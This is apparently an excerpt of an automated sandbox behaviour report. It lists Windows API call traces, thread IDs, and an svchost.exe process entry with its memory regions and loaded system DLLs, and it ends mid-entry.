[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec94, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ec94) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eaf8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38eaf8) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38e914, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38e914) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38e914, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38e914) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ea08, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ea08) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ec2c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ec2c) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38e980, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38e980) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ea64, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ea64) returned 1
[0269.784] GetSystemMetrics (nIndex=34) returned 132
[0269.784] GetSystemMetrics (nIndex=35) returned 38
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ebec, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ebec) returned 1
[0269.784] AdjustWindowRectEx (in: lpRect=0x38ea50, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ea50) returned 1
[0269.850] EtwEventRegister () returned 0x0
[0269.858] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", nBufferLength=0x105, lpBuffer=0x38e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", lpFilePart=0x0) returned 0x35
[0269.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38e7f8) returned 1
[0269.859] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x38eabc | out: lpFileInformation=0x38eabc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0269.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38e7f4) returned 1
[0271.480] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa00, lpName=0x0) returned 0x24c
[0271.480] memcpy (in: _Dst=0x470000, _Src=0x24151dc, _Size=0xfa00 | out: _Dst=0x470000) returned 0x470000
[0271.481] CloseHandle (hObject=0x24c) returned 1
Thread:
id = 91
os_tid = 0x764
Thread:
id = 92
os_tid = 0x76c
[0263.303] CoGetContextToken (in: pToken=0x44ff63c | out: pToken=0x44ff63c) returned 0x800401f0
[0263.305] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 93
os_tid = 0x778
Thread:
id = 122
os_tid = 0x618
Thread:
id = 123
os_tid = 0x678
Thread:
id = 130
os_tid = 0x714
Thread:
id = 131
os_tid = 0x6d0
Process:
id = "11"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x26e78000"
os_pid = "0x234"
os_integrity_level = "0x4000"
os_privileges = "0x60b00080"
monitor_reason = "rpc_server"
parent_id = "9"
os_parent_pid = "0x1c8"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007683" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2986
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2987
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 2988
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2989
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2990
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2991
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2992
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2993
start_va = 0xe0000
end_va = 0xecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2994
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 2995
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 2996
start_va = 0x110000
end_va = 0x11ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 2997
start_va = 0x120000
end_va = 0x120fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 2998
start_va = 0x130000
end_va = 0x130fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 2999
start_va = 0x140000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 3000
start_va = 0x150000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 3001
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 3002
start_va = 0x1f0000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 3003
start_va = 0x270000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 3004
start_va = 0x3a0000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 3005
start_va = 0x520000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 3006
start_va = 0x5a0000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 3007
start_va = 0x6b0000
end_va = 0x72ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 3008
start_va = 0x7a0000
end_va = 0x81ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007a0000"
filename = ""
Region:
id = 3009
start_va = 0x860000
end_va = 0xb2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3010
start_va = 0xb30000
end_va = 0xcb7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b30000"
filename = ""
Region:
id = 3011
start_va = 0xcc0000
end_va = 0xe40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000cc0000"
filename = ""
Region:
id = 3012
start_va = 0xee0000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 3013
start_va = 0x1000000
end_va = 0x107ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001000000"
filename = ""
Region:
id = 3014
start_va = 0x10a0000
end_va = 0x111ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010a0000"
filename = ""
Region:
id = 3015
start_va = 0x1120000
end_va = 0x121ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001120000"
filename = ""
Region:
id = 3016
start_va = 0x1270000
end_va = 0x12effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001270000"
filename = ""
Region:
id = 3017
start_va = 0x1300000
end_va = 0x137ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 3018
start_va = 0x13c0000
end_va = 0x143ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 3019
start_va = 0x1450000
end_va = 0x14cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001450000"
filename = ""
Region:
id = 3020
start_va = 0x1550000
end_va = 0x15cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001550000"
filename = ""
Region:
id = 3021
start_va = 0x15d0000
end_va = 0x164ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015d0000"
filename = ""
Region:
id = 3022
start_va = 0x16d0000
end_va = 0x174ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016d0000"
filename = ""
Region:
id = 3023
start_va = 0x17b0000
end_va = 0x182ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000017b0000"
filename = ""
Region:
id = 3024
start_va = 0x1860000
end_va = 0x18dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001860000"
filename = ""
Region:
id = 3025
start_va = 0x18e0000
end_va = 0x19dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018e0000"
filename = ""
Region:
id = 3026
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3027
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3028
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3029
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 3030
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 3031
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 3032
start_va = 0xff5b0000
end_va = 0xff5bafff
monitored = 0
entry_point = 0xff5b246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 3033
start_va = 0x7fef6b00000
end_va = 0x7fef6b20fff
monitored = 0
entry_point = 0x7fef6b103b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 3034
start_va = 0x7fef6b30000
end_va = 0x7fef6b42fff
monitored = 0
entry_point = 0x7fef6b31d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 3035
start_va = 0x7fef7570000
end_va = 0x7fef757dfff
monitored = 0
entry_point = 0x7fef7575500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 3036
start_va = 0x7fef7b50000
end_va = 0x7fef7b76fff
monitored = 0
entry_point = 0x7fef7b511a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 3037
start_va = 0x7fef7b80000
end_va = 0x7fef7c52fff
monitored = 0
entry_point = 0x7fef7bf8b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 3038
start_va = 0x7fef7cb0000
end_va = 0x7fef7ce1fff
monitored = 0
entry_point = 0x7fef7ccca90
region_type = mapped_file
name = "wmidcprv.dll"
filename = "\\Windows\\System32\\wbem\\WmiDcPrv.dll" (normalized: "c:\\windows\\system32\\wbem\\wmidcprv.dll")
Region:
id = 3039
start_va = 0x7fef7e30000
end_va = 0x7fef7ea6fff
monitored = 0
entry_point = 0x7fef7e6e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 3040
start_va = 0x7fefb280000
end_va = 0x7fefb2acfff
monitored = 0
entry_point = 0x7fefb281010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 3041
start_va = 0x7fefb6b0000
end_va = 0x7fefb6c0fff
monitored = 0
entry_point = 0x7fefb6b1070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 3042
start_va = 0x7fefc4c0000
end_va = 0x7fefc540fff
monitored = 0
entry_point = 0x7fefc4ccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3043
start_va = 0x7fefc550000
end_va = 0x7fefc55cfff
monitored = 0
entry_point = 0x7fefc551348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 3044
start_va = 0x7fefc560000
end_va = 0x7fefc58bfff
monitored = 0
entry_point = 0x7fefc561860
region_type = mapped_file
name = "umpo.dll"
filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll")
Region:
id = 3045
start_va = 0x7fefc590000
end_va = 0x7fefc5aafff
monitored = 0
entry_point = 0x7fefc592068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 3046
start_va = 0x7fefc5b0000
end_va = 0x7fefc5cdfff
monitored = 0
entry_point = 0x7fefc5b13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 3047
start_va = 0x7fefc5d0000
end_va = 0x7fefc5e1fff
monitored = 0
entry_point = 0x7fefc5d1060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 3048
start_va = 0x7fefc5f0000
end_va = 0x7fefc60efff
monitored = 0
entry_point = 0x7fefc5f5c68
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 3049
start_va = 0x7fefc610000
end_va = 0x7fefc676fff
monitored = 0
entry_point = 0x7fefc61d320
region_type = mapped_file
name = "umpnpmgr.dll"
filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll")
Region:
id = 3050
start_va = 0x7fefc6c0000
end_va = 0x7fefc6c9fff
monitored = 0
entry_point = 0x7fefc6c3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 3051
start_va = 0x7fefc7f0000
end_va = 0x7fefc836fff
monitored = 0
entry_point = 0x7fefc7f1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3052
start_va = 0x7fefcaf0000
end_va = 0x7fefcb07fff
monitored = 0
entry_point = 0x7fefcaf3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 3053
start_va = 0x7fefcc50000
end_va = 0x7fefcc71fff
monitored = 0
entry_point = 0x7fefcc55d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 3054
start_va = 0x7fefd0c0000
end_va = 0x7fefd0e4fff
monitored = 0
entry_point = 0x7fefd0c9658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3055
start_va = 0x7fefd0f0000
end_va = 0x7fefd0fefff
monitored = 0
entry_point = 0x7fefd0f1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 3056
start_va = 0x7fefd1a0000
end_va = 0x7fefd1dcfff
monitored = 0
entry_point = 0x7fefd1a18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 3057
start_va = 0x7fefd1e0000
end_va = 0x7fefd1f3fff
monitored = 0
entry_point = 0x7fefd1e10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 3058
start_va = 0x7fefd200000
end_va = 0x7fefd20efff
monitored = 0
entry_point = 0x7fefd2019b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 3059
start_va = 0x7fefd2a0000
end_va = 0x7fefd2aefff
monitored = 0
entry_point = 0x7fefd2a1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3060
start_va = 0x7fefd2b0000
end_va = 0x7fefd2c9fff
monitored = 0
entry_point = 0x7fefd2b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 3061
start_va = 0x7fefd2d0000
end_va = 0x7fefd33bfff
monitored = 0
entry_point = 0x7fefd2d2780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3062
start_va = 0x7fefd3e0000
end_va = 0x7fefd415fff
monitored = 0
entry_point = 0x7fefd3e1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 3063
start_va = 0x7fefd420000
end_va = 0x7fefd58cfff
monitored = 0
entry_point = 0x7fefd4210b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3064
start_va = 0x7fefd590000
end_va = 0x7fefd5cafff
monitored = 0
entry_point = 0x7fefd591324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 3065
start_va = 0x7fefd5d0000
end_va = 0x7fefd7d2fff
monitored = 0
entry_point = 0x7fefd5f3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3066
start_va = 0x7fefd860000
end_va = 0x7fefd8acfff
monitored = 0
entry_point = 0x7fefd861070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3067
start_va = 0x7fefd8b0000
end_va = 0x7fefd94efff
monitored = 0
entry_point = 0x7fefd8b25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3068
start_va = 0x7fefd950000
end_va = 0x7fefd9e8fff
monitored = 0
entry_point = 0x7fefd951c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 3069
start_va = 0x7fefd9f0000
end_va = 0x7fefdaf8fff
monitored = 0
entry_point = 0x7fefd9f1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3070
start_va = 0x7fefdb00000
end_va = 0x7fefdcd6fff
monitored = 0
entry_point = 0x7fefdb01010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 3071
start_va = 0x7fefdce0000
end_va = 0x7fefdda8fff
monitored = 0
entry_point = 0x7fefdd5a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3072
start_va = 0x7fefed60000
end_va = 0x7fefed6dfff
monitored = 0
entry_point = 0x7fefed61080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3073
start_va = 0x7fefed70000
end_va = 0x7fefed77fff
monitored = 0
entry_point = 0x7fefed71504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3074
start_va = 0x7feff130000
end_va = 0x7feff181fff
monitored = 0
entry_point = 0x7feff1310d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 3075
start_va = 0x7feff190000
end_va = 0x7feff1aefff
monitored = 0
entry_point = 0x7feff1960e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3076
start_va = 0x7feff1b0000
end_va = 0x7feff1ddfff
monitored = 0
entry_point = 0x7feff1b1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3077
start_va = 0x7feff1e0000
end_va = 0x7feff246fff
monitored = 0
entry_point = 0x7feff1eb03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3078
start_va = 0x7feff250000
end_va = 0x7feff37cfff
monitored = 0
entry_point = 0x7feff29ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3079
start_va = 0x7feff380000
end_va = 0x7feff456fff
monitored = 0
entry_point = 0x7feff383274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3080
start_va = 0x7feff460000
end_va = 0x7feff53afff
monitored = 0
entry_point = 0x7feff480760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3081
start_va = 0x7feff5d0000
end_va = 0x7feff5d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3082
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 3083
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 3084
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 3085
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 3086
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 3087
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 3088
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 3089
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 3090
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 3091
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 3092
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 3093
